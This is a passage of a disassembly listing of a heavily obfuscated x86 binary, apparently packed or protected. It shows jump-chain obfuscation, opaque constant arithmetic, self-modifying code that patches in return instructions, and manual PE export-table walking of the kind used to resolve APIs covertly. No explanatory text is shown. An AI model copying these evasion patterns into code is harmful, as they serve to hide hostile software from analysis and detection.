; END OF FUNCTION CHUNK FOR sub_43A0C7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_396. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43D94E: ; CODE XREF: ut7h7i2x:004489CEj
mov [eax], ebx
; START OF FUNCTION CHUNK FOR sub_45967C
loc_43D950: ; CODE XREF: sub_45967C:loc_43F7B0j
; sub_43C1E5:loc_4489B4j
add esi, 0ACDAB485h
rol esi, 1Ch
add esi, 0A8F0EC25h
xchg esi, [esp-8+arg_4]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C273
loc_43D967: ; CODE XREF: sub_44C273-905Bj
jnz loc_43CBB4
jmp loc_450BE4
; END OF FUNCTION CHUNK FOR sub_44C273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45410C
loc_43D972: ; CODE XREF: sub_45410C-C347j
sub eax, 71CB49EFh
mov [eax], edi
rol esi, 3
jmp loc_456682
; END OF FUNCTION CHUNK FOR sub_45410C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44937E
loc_43D982: ; CODE XREF: sub_44937E-E411j
push eax
call sub_454196
retn
; END OF FUNCTION CHUNK FOR sub_44937E
; =============== S U B R O U T I N E =======================================
sub_43D989 proc near ; CODE XREF: ut7h7i2x:004563C6j
; sub_4393B6+1DAE9p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043AEB4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004411A4 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00442CC0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443878 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044A37A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AF31 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A72A SIZE 0000000A BYTES
jno loc_442CC0
push esi
push ebp
pop esi
jmp loc_44A37A
sub_43D989 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_43D997: ; CODE XREF: sub_44E5DC:loc_440171j
add edx, ebp
add edx, 0AD82C9EEh
mov edx, [edx]
loc_43D9A1: ; CODE XREF: sub_459111:loc_43C344j
imul byte ptr [edx]
jmp loc_440A54
; END OF FUNCTION CHUNK FOR sub_44E5DC
; =============== S U B R O U T I N E =======================================
sub_43D9A8 proc near ; CODE XREF: sub_4456C9+Ep
; ut7h7i2x:00454F6Dj
; FUNCTION CHUNK AT 0044261D SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00444260 SIZE 00000006 BYTES
xchg esi, [esp+0]
pop esi
mov edx, esp
push eax
mov eax, edx
xchg eax, [esp+0]
push 0
call sub_4393B6
or ebx, 0B2DA8557h
cmp edx, ecx
jmp loc_444260
sub_43D9A8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C5D9
loc_43D9C8: ; CODE XREF: sub_44C5D9:loc_44C5E7j
push offset loc_458C00
jmp loc_44CE62
; END OF FUNCTION CHUNK FOR sub_44C5D9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_43D9D2: ; CODE XREF: sub_43FCEE+340Dj
; ut7h7i2x:004438B7j ...
jmp loc_4548CF
; ---------------------------------------------------------------------------
loc_43D9D7: ; CODE XREF: ut7h7i2x:0043D1EFj
; ut7h7i2x:0043E839j ...
push offset loc_45169E
jmp loc_44C702
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B122
loc_43D9E1: ; CODE XREF: sub_44B122-9B05j
call sub_44FDF2
loc_43D9E6: ; DATA XREF: ut7h7i2x:0043AC0Fo
jz loc_44509D
call sub_45941F
jnz loc_44509D
mov eax, ebx
jmp loc_44509F
; END OF FUNCTION CHUNK FOR sub_44B122
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4519D2
loc_43D9FE: ; CODE XREF: sub_4519D2:loc_448223j
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jz loc_44509D
jmp loc_459401
; END OF FUNCTION CHUNK FOR sub_4519D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_43DA12: ; CODE XREF: sub_44602A:loc_44F058j
mov ebx, ecx
pop ecx
xchg eax, [esp+0]
mov ebp, eax
pop eax
retn
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_43DA1C: ; CODE XREF: sub_44F495+68EAj
jmp nullsub_249
; END OF FUNCTION CHUNK FOR sub_44F495
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DA21 proc near ; CODE XREF: ut7h7i2x:00447A94j
; ut7h7i2x:loc_44B22Dp ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B824 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451A6F SIZE 0000000E BYTES
push ebp
mov ebp, esp
jmp loc_43B824
sub_43DA21 endp
; ---------------------------------------------------------------------------
loc_43DA29: ; CODE XREF: ut7h7i2x:0044295Cj
jo loc_44E074
cmp edx, 0C13710F4h
jmp loc_445E3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DD56
loc_43DA3A: ; CODE XREF: ut7h7i2x:00448832j
; sub_44DD56-4479j
xor ebx, 9B73E486h
or ebx, 3B154AF2h
test ebx, 8000h
jmp loc_4441BB
; END OF FUNCTION CHUNK FOR sub_44DD56
; ---------------------------------------------------------------------------
loc_43DA51: ; CODE XREF: ut7h7i2x:00445AC5j
test ebx, 0C336200Ch
jmp loc_453AC2
; ---------------------------------------------------------------------------
jge loc_453CFA
; START OF FUNCTION CHUNK FOR sub_45854D
loc_43DA62: ; CODE XREF: sub_45854D:loc_4574EAj
cmp esi, edx
jmp loc_455CB3
; END OF FUNCTION CHUNK FOR sub_45854D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DB21
loc_43DA69: ; CODE XREF: sub_43DB21+18j
jl loc_454EC7
mov edi, [esi]
jmp loc_454EBE
; END OF FUNCTION CHUNK FOR sub_43DB21
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43DA76: ; CODE XREF: sub_44EC6F-5081j
; sub_439BF8+15072j
jz loc_451DDA
jmp loc_43C44D
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DCB8
loc_43DA81: ; CODE XREF: sub_43DCB8:loc_43DCC7j
mov eax, 0F34E90C0h
call sub_43AA94
mov ds:off_41D13C, eax
lea eax, sub_442E16
mov byte ptr [eax], 0C3h
jmp sub_442E16
; END OF FUNCTION CHUNK FOR sub_43DCB8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_43DA9F: ; CODE XREF: sub_43CCC3:loc_44A9B1j
test eax, 2
jmp loc_43A8BC
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446ACE
loc_43DAAA: ; CODE XREF: sub_446ACE:loc_43ACE4j
rol esi, 1Fh
jnb loc_440437
loc_43DAB3: ; CODE XREF: sub_450A55+15j
jmp loc_45513D
; END OF FUNCTION CHUNK FOR sub_446ACE
; ---------------------------------------------------------------------------
and edi, esi
adc ecx, 9010E01Ch
jmp loc_440435
; =============== S U B R O U T I N E =======================================
sub_43DAC5 proc near ; CODE XREF: ut7h7i2x:0043B224p
; ut7h7i2x:00440C49j
xchg eax, [esp+0]
pop eax
mov edx, [ebp-4]
imul byte ptr [edx]
call sub_43A76A
sub_43DAC5 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_443BD9
loc_43DAD3: ; CODE XREF: sub_443BD9+F61Aj
jmp nullsub_486
; END OF FUNCTION CHUNK FOR sub_443BD9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440B52
loc_43DAD8: ; CODE XREF: sub_440B52+Aj
jmp loc_43CFF8
; END OF FUNCTION CHUNK FOR sub_440B52
; ---------------------------------------------------------------------------
push 0EE9DFB7Ch
pop edx
add edx, 0B606E756h
xor edx, 0AA892FA9h
and edx, 14557A64h
call sub_4415EB
loc_43DAFA: ; CODE XREF: ut7h7i2x:00453F5Aj
mov ebx, 5E841DBBh
; =============== S U B R O U T I N E =======================================
sub_43DAFF proc near ; CODE XREF: sub_4402A5:loc_44C18Bp
; FUNCTION CHUNK AT 00442DB8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00449A33 SIZE 00000014 BYTES
xchg eax, [esp+0]
pop eax
call sub_44E2C4
test al, al
jz loc_442DB8
jmp loc_439D8F
sub_43DAFF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_43DB15: ; CODE XREF: sub_43AB62+13084j
jbe loc_455302
pushf
jmp loc_4592FE
; END OF FUNCTION CHUNK FOR sub_43AB62
; =============== S U B R O U T I N E =======================================
sub_43DB21 proc near ; DATA XREF: sub_43ABD1:loc_457D57o
; FUNCTION CHUNK AT 0043DA69 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446D62 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00454EBE SIZE 00000028 BYTES
push 0D35A03B0h
pop eax
or eax, 7FCA9B91h
add eax, 0FA85F945h
cmp eax, 7312BF2Fh
jmp loc_43DA69
sub_43DB21 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_43DB3E: ; CODE XREF: sub_44B5CF:loc_4507CBj
; sub_44B5CF+C439j
call sub_4587DD
push 0CC802980h
loc_43DB48: ; CODE XREF: ut7h7i2x:loc_44E0BEj
pop edx
and edx, 0B5F9199Ah
jmp loc_447482
; END OF FUNCTION CHUNK FOR sub_44B5CF
; =============== S U B R O U T I N E =======================================
sub_43DB54 proc near ; CODE XREF: ut7h7i2x:00444C1Aj
; sub_45A71D+3p
xchg ecx, [esp+0]
pop ecx
call sub_444E04
push 7A682495h
pop eax
jmp loc_44D078
sub_43DB54 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
rol ecx, 17h
jmp loc_444D20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_43DB70: ; CODE XREF: sub_4524FE:loc_44FF1Bj
xor ebx, 5176CF14h
shl edx, 0Ch
test ebp, edi
jmp loc_4391AD
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458345
loc_43DB80: ; CODE XREF: sub_458345-E22Fj
mov [ebp+0], edi
jnz loc_44A7CD
; END OF FUNCTION CHUNK FOR sub_458345
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_43DB89: ; CODE XREF: sub_4408C2:loc_43E526j
; sub_4408C2+Ej ...
jnz loc_45AA42
cmp dword ptr [ebp-4], 2
jnz loc_454070
jmp loc_45A604
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43DB9E: ; CODE XREF: ut7h7i2x:loc_443532j
; sub_439BF8+E901j
xchg ebp, [esp+8+var_8]
push 26F085F0h
pop eax
sub eax, 62FB8CD8h
or eax, 0FED9AD0Ch
xor eax, 28FC478Eh
jmp loc_447E96
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
popf
jmp sub_4521DB
; ---------------------------------------------------------------------------
loc_43DBC4: ; DATA XREF: sub_44D998-EF0Bo
push 4DF038A4h
pop eax
; START OF FUNCTION CHUNK FOR sub_444273
loc_43DBCA: ; CODE XREF: sub_444273+DDC3j
sub eax, 6597D4Eh
test eax, 1
jmp loc_43D6B3
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4464B7
loc_43DBDB: ; CODE XREF: sub_4464B7+8B2Dj
shr edx, 17h
loc_43DBDE: ; CODE XREF: sub_4464B7:loc_4451FDj
push 0F127CCF9h
pop eax
rol eax, 12h
jmp loc_44B88B
; END OF FUNCTION CHUNK FOR sub_4464B7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DBEC proc near ; DATA XREF: sub_449E59o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A122 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043A6DD SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0043A73D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043AA59 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AE52 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B063 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B5C8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C33A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D584 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E360 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F183 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004406B8 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004424AA SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004432AC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044388C SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004438D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444B0A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044524A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044540C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446C1E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447094 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00447700 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00449661 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00449C6A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B5AB SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044BD10 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044C1AB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044C41F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E0D0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044F6FD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450640 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450785 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450D90 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450E87 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004528E5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045332C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453F45 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453F5F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045545C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455879 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045823D SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00459554 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045994D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045A487 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A496 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A784 SIZE 0000001B BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
xchg edi, [esp+0]
mov ebp, edi
jmp loc_45823D
sub_43DBEC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43DBFC: ; CODE XREF: ut7h7i2x:loc_443357j
pop esi
or esi, ds:4000F3h
add esi, 0CE28CFDBh
jnz loc_44AD5B
sbb ebx, 751302D3h
sub ebx, 8CDBF5BBh
jmp loc_44AD57
; ---------------------------------------------------------------------------
loc_43DC20: ; CODE XREF: ut7h7i2x:00445925j
test esi, ecx
jmp loc_44E709
; ---------------------------------------------------------------------------
loc_43DC27: ; DATA XREF: sub_442AD1-9758o
push 0FF2D76DBh
pop eax
and eax, 17D7B975h
or eax, 13A92CB2h
sub eax, 0BE58EB5Dh
xor eax, 15A5987Bh
jmp loc_43ACAB
; ---------------------------------------------------------------------------
loc_43DC4A: ; CODE XREF: ut7h7i2x:00439394j
jz loc_44013A
jmp loc_45561F
; ---------------------------------------------------------------------------
cmp edi, eax
jmp loc_457E5B
; =============== S U B R O U T I N E =======================================
sub_43DC5C proc near ; CODE XREF: ut7h7i2x:004397B5p
; ut7h7i2x:00441B31j
xchg ecx, [esp+0]
pop ecx
lea eax, sub_4545FB
mov byte ptr [eax], 0C3h
jmp sub_4545FB
sub_43DC5C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4545FB
loc_43DC6E: ; CODE XREF: sub_4545FBj
pop edx
loc_43DC6F: ; CODE XREF: ut7h7i2x:loc_443FB1j
mov eax, [esp-4+arg_0]
jmp loc_450FB3
; END OF FUNCTION CHUNK FOR sub_4545FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A0A5
loc_43DC77: ; CODE XREF: sub_45A0A5+15j
add edi, 6B6EC8ACh
sub eax, edi
call sub_453188
; END OF FUNCTION CHUNK FOR sub_45A0A5
; START OF FUNCTION CHUNK FOR sub_44682E
loc_43DC84: ; CODE XREF: sub_44682E+1j
mov eax, [esp+0]
push edx
loc_43DC88: ; CODE XREF: ut7h7i2x:00443E0Bj
call sub_44D8E8
push 0E3BA0692h
pop eax
xor eax, 33AC35DBh
js loc_44ED4F
loc_43DC9F: ; CODE XREF: sub_455775:loc_449D36j
xor eax, 4B00FEE5h
add eax, ebp
push esi
push offset loc_444736
jmp nullsub_61
; END OF FUNCTION CHUNK FOR sub_44682E
; ---------------------------------------------------------------------------
loc_43DCB2: ; CODE XREF: ut7h7i2x:00458576j
jno loc_44A343
; =============== S U B R O U T I N E =======================================
sub_43DCB8 proc near ; CODE XREF: sub_444BAE-7AECp
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043DA81 SIZE 0000001E BYTES
xchg edi, [esp+0]
pop edi
sub eax, ebx
adc edx, ebx
mov edx, ecx
call sub_44D2FA
loc_43DCC7: ; CODE XREF: sub_442E16+F898j
jmp loc_43DA81
sub_43DCB8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43DCCC: ; CODE XREF: ut7h7i2x:00441A09j
jmp loc_43CED2
; ---------------------------------------------------------------------------
test al, al
jz loc_4398E7
jmp loc_459621
; ---------------------------------------------------------------------------
ror esi, 2
jmp sub_454F0A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4545D8
loc_43DCE6: ; CODE XREF: sub_4545D8:loc_4439ABj
jz loc_447C81
; END OF FUNCTION CHUNK FOR sub_4545D8
; START OF FUNCTION CHUNK FOR sub_44B68F
loc_43DCEC: ; CODE XREF: sub_44B68F+A035j
jmp loc_439E05
; END OF FUNCTION CHUNK FOR sub_44B68F
; ---------------------------------------------------------------------------
jge loc_44064F
pop eax
not ecx
jmp loc_450FC3
; =============== S U B R O U T I N E =======================================
sub_43DCFF proc near ; CODE XREF: sub_43D17F:loc_43CB3Ap
; ut7h7i2x:0044D742j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043CC39 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D924 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043F1C1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004425CE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00444289 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00446E42 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004495B4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044C626 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D024 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00458863 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045A725 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
jns loc_43D924
pop edx
mov eax, [esp-8+arg_4]
push offset loc_44FCC3
jmp nullsub_32
sub_43DCFF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43DD17 proc near ; CODE XREF: sub_43B1E6+4p
; ut7h7i2x:00453C4Cj
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043BDE5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043D48F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00440209 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044087A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00441291 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00441951 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441EF1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004425DC SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00447B02 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448006 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044A2EC SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044A4AE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E141 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044EB3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451B59 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00454BA8 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00457146 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045750D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A031 SIZE 0000001F BYTES
xchg esi, [esp+0]
loc_43DD1A: ; CODE XREF: sub_455145-855Ej
pop esi
cmp ds:dword_43A79C, 0
jz loc_441291
mov eax, ds:dword_43A79C
jmp loc_451B59
sub_43DD17 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43DD32 proc near ; DATA XREF: sub_45002D-EB6Bo
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0045857B SIZE 00000017 BYTES
xchg ecx, [esp+0]
push 0BE50C85Ah
xchg eax, [esp+4+var_4]
mov edx, eax
pop eax
jmp loc_45857B
sub_43DD32 endp
; ---------------------------------------------------------------------------
loc_43DD45: ; CODE XREF: ut7h7i2x:00459D6Bj
pop eax
sub eax, 0EC0A978Ah
and eax, 0A05273A3h
rol eax, 4
add eax, 97E1447Dh
jmp loc_454F96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FDF2
loc_43DD60: ; CODE XREF: sub_44FDF2:loc_444881j
add eax, eax
loc_43DD62: ; CODE XREF: sub_44B211+Bj
cdq
add eax, [esp+0]
adc edx, [esp+arg_0]
add esp, 8
call sub_44BCCB
; END OF FUNCTION CHUNK FOR sub_44FDF2
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_43DD72: ; CODE XREF: sub_4417AF-4551j
jmp nullsub_159
; END OF FUNCTION CHUNK FOR sub_4417AF
; ---------------------------------------------------------------------------
pop edx
mov eax, [esp]
push ebp
mov ebp, edx
xchg ebp, [esp]
push edx
push 0FC29F565h
jmp loc_44CED5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_512. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4471CA
loc_43DD8D: ; CODE XREF: sub_4471CA+6j
xor eax, 0C435AC02h
rol eax, 6
xor eax, 8B91EE2Eh
call sub_45292B
test al, al
jz nullsub_529
jmp loc_453D6E
; END OF FUNCTION CHUNK FOR sub_4471CA
; ---------------------------------------------------------------------------
loc_43DDAE: ; CODE XREF: ut7h7i2x:0044D73Cj
pop ebx
call sub_446B2B
sbb edx, 0DD7C7B89h
jmp sub_4570FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C20D
loc_43DDBF: ; CODE XREF: sub_44C20D:loc_442E45j
xchg eax, [esp+0]
push 0
call sub_451C98
; END OF FUNCTION CHUNK FOR sub_44C20D
; START OF FUNCTION CHUNK FOR sub_446320
loc_43DDC9: ; CODE XREF: sub_446320+129D3j
jmp loc_44FDBF
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C852
loc_43DDCE: ; CODE XREF: sub_44C852+3310j
jmp loc_45A050
; END OF FUNCTION CHUNK FOR sub_44C852
; ---------------------------------------------------------------------------
loc_43DDD3: ; CODE XREF: ut7h7i2x:0043FB95j
jmp locret_43F693
; ---------------------------------------------------------------------------
locret_43DDD8: ; CODE XREF: ut7h7i2x:loc_442FDDj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_43DDD9: ; CODE XREF: sub_439AE7+4F9Dj
add ebp, 9DBF034Fh
jmp loc_43F746
; END OF FUNCTION CHUNK FOR sub_439AE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_43DDE4: ; CODE XREF: sub_449D3B:loc_44F225j
jnz loc_449694
loc_43DDEA: ; CODE XREF: ut7h7i2x:loc_455B4Bj
jmp loc_4439A6
; END OF FUNCTION CHUNK FOR sub_449D3B
; =============== S U B R O U T I N E =======================================
sub_43DDEF proc near ; CODE XREF: sub_456E7D-1768Aj
; sub_43BA9E:loc_453853j ...
xchg eax, [esp+0]
pop eax
call sub_457EF4
jmp ds:off_41D0D4
sub_43DDEF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_43DDFE: ; CODE XREF: sub_43FCEE+130DFj
jmp loc_443DE0
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4589E0
loc_43DE03: ; CODE XREF: sub_4589E0-15FCFj
jmp loc_444F80
; END OF FUNCTION CHUNK FOR sub_4589E0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_360. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452CBB
loc_43DE09: ; CODE XREF: sub_452CBB+4j
jmp loc_44274B
; END OF FUNCTION CHUNK FOR sub_452CBB
; ---------------------------------------------------------------------------
loc_43DE0E: ; CODE XREF: ut7h7i2x:0044217Dj
jmp loc_44E4C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_43DE13: ; CODE XREF: sub_43FF65+17219j
jz loc_451AD8
mov eax, [esi]
sbb ebp, esi
jmp loc_44DDE3
; END OF FUNCTION CHUNK FOR sub_43FF65
; =============== S U B R O U T I N E =======================================
sub_43DE22 proc near ; DATA XREF: ut7h7i2x:0044BE47o
; FUNCTION CHUNK AT 004411CC SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F094 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00450B2E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A1A2 SIZE 00000006 BYTES
add eax, 31227772h
call sub_43AA94
push ebx
push 21F2D23Ah
pop ebx
or ebx, 97375A57h
jmp loc_450B2E
sub_43DE22 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E9CB
loc_43DE3F: ; CODE XREF: sub_43E9CB+Cj
call sub_459760
loc_43DE44: ; CODE XREF: sub_43A556+1531Dj
jmp loc_44A549
; END OF FUNCTION CHUNK FOR sub_43E9CB
; ---------------------------------------------------------------------------
loc_43DE49: ; CODE XREF: ut7h7i2x:0044D2ACj
sbb edx, ebp
cmp edx, 64B0E483h
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_43DE51: ; CODE XREF: sub_4524FE:loc_452EA8j
jmp loc_44ACE1
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B45E
loc_43DE56: ; CODE XREF: sub_43B513:loc_43B515j
; sub_44B45E-DE66j ...
jmp loc_453E81
; END OF FUNCTION CHUNK FOR sub_44B45E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B513
loc_43DE5B: ; CODE XREF: sub_43B513+2F0Fj
; sub_44B45E+3FCCj
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_43B513
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4395FB
loc_43DE5E: ; CODE XREF: sub_4395FB+107C4j
jmp nullsub_168
; END OF FUNCTION CHUNK FOR sub_4395FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4416C9
loc_43DE63: ; CODE XREF: sub_4416C9+7j
jmp loc_445009
; END OF FUNCTION CHUNK FOR sub_4416C9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_43DE68: ; CODE XREF: sub_4524FE:loc_43C1CDj
jl loc_44E92B
loc_43DE6E: ; CODE XREF: ut7h7i2x:00442C95j
jmp loc_43F01A
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
push edi
test ebx, edi
jmp loc_4492EA
; ---------------------------------------------------------------------------
adc esi, edx
jmp sub_44D082
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_43DE82: ; CODE XREF: sub_44F43B:loc_450D69j
jo loc_44801C
jp loc_453D45
